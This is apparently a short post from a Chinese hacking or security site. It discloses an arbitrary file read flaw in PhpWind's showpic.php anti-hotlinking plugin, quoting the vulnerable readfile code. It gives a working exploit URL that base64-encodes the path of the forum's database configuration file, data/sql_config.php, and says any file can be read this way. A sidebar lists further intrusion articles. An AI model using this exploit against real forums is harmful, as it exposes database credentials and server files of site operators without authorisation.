[组图]PhpWind 防盗链插件Showpic.php本地读文件漏洞| 以下是引用片段: str=$_SERVER['QUERY_STRING']; $img=base64_decode($str); $codelen=strlen($safeguard);//获取附加码长度 $img=substr($img,$codelen); //去掉附加码 readfile($img); |
提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后提交,以读出文件内容
漏洞利用方式:
http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA==
然后查看源文件。
这里的ZGF0YS9zcWxfY29uZmlnLnBocA== 是路径data/sql_config.php的BASE64编码。
你也可以改为其他路径文件的。BASE64编码就可以看到文件内容了。
精灵写的利用工具:
| PhpWind 防盗链插件Showpic.php本 | 05-11 | |
| 沸腾新闻系统V1.1 Access版 Fini | 05-09 | |
| 轻易绕过PhpWind论坛程序高危漏洞 | 04-21 | |
| 世纪热线完美版跨站漏洞提权入侵 | 04-16 | |
| 对讯时新闻发布系统的艰难突破 | 04-16 | |
| 美国暴雪[魔兽世界] 官方程序漏洞 | 04-16 | |
| 动网论坛(SQL版)后台注入方法 | 04-16 | |
| 渗透中用openrowset搞shell的方法 | 04-12 | |
| 记一次对在线挂机网站的渗透 | 04-10 | |
| 百度再现XSS高危漏洞 | 04-10 | |
| phpwind 从后台拿webshell的三种 | 04-09 | |
| Discuz 5.0 0day + PM短信饶过方 | 04-09 | |
您现在的位置: